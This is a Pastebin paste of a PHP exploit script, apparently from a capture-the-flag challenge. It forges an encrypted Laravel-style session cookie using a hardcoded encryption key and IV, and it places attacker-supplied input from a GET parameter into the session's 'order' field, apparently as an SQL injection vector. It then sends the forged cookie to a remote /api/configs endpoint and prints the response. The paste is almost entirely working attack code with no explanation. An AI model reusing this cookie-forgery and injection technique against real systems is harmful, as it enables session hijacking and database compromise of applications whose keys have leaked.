Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $xx = "id->".$_GET['ID'];
- #$xx = "id".$_GET['ID'];
- function Encrypt_cookie($injection){
- $injection_len = strlen($injection);
- $iv = base64_decode("NCrxoY38UWcSzNwpDAiL0g==");
- $API_key = "T1wpqsiM32225Qj3WZEY8uIThwkkeuk2Yh4BfIapo6U=";
- $cipher = 'AES-256-CBC';
- $encrypt = '{"data":"a:6:{s:6:\"_token\";s:40:\"5S4EdcFhvZRyyfHN3MfWTSvdacuXJrBm4EUCKOE1\";s:8:\"username\";s:8:\"guestdaf\";s:5:\"order\";s:'.$injection_len.':\"'.$injection.'\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\/\/178.62.107.35:32168\/api\/configs\";}}","expires":1613210637}';
- $value = openssl_encrypt($encrypt, $cipher, base64_decode($API_key), 0, $iv);
- $iv = base64_encode($iv);
- $mac = hash_hmac('sha256', $iv.$value, base64_decode($API_key));
- $json = json_encode(compact('iv', 'value', 'mac'));
- if (json_last_error() !== JSON_ERROR_NONE) {
- echo "Could not json encode data." ;
- exit();
- }
- $encodedPayload = urlencode(base64_encode($json));
- #echo $encodedPayload;
- return $encodedPayload;
- }
- function connect($INJ){
- $opts = [
- "http" => [
- "method" => "GET",
- "header" => "Accept-language: en\r\n" .
- "Cookie: nginxatsu_session= eyJpdiI6IlZwaTZ2aFpTK0ZHXC82UktBQUR3K2tBPT0iLCJ2YWx1ZSI6IkhyM1M2NWRBYys0TFVPMVwvM2thVFhmN1ZSbkFPelNRMldXRTRwNHhWdmFXdFJmdjJlVEJvakloVnJrODJZbjVUIiwibWFjIjoiNTJmZDhkNGJhYWI4NzU0YTE5MmY0ZDU5OTE4OTJlZWU1YmNkYzE4MDYzMmJiZjJhZTVhNWI1ODhiNWI1ZDBmYSJ9; iIjzgRNxKtccRXLIAZRxww050hcSY39ywBNHZoI4=".Encrypt_cookie($INJ)."\r\n"
- ]
- ];
- $context = stream_context_create($opts);
- #echo $opts['http'];
- $file = file_get_contents('http://206.189.121.131:31942/api/configs', false, $context);
- echo $file;
- }
- connect($xx);
Add Comment
Please, Sign In to add comment
